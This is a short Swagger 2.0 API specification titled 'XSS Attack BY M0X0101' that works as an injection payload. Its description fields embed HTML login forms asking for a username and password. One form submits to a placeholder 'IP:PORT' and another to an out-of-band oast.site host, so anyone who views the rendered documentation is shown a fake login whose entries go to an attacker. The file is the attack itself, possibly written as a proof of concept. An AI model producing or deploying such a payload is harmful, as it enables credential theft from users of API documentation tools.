swagger: '2.0'
info:
  title: XSS Attack BY M0X0101
  description: |
    <form action="http://IP:PORT">
      Username:<br>
      <input type="text" name="username"><br>
      Password:<br>
      <input type="password" name="password"><br><br>
      <input type="submit" value="Login">
    </form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form action="http://co36to4ahse0lvr1jacgw3snsjk3ot3ng.oast.site">
              Username:<br>
              <input type="text" name="username"><br>
              Password:<br>
              <input type="password" name="password"><br><br>
              <input type="submit" value="Login">
            </form>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
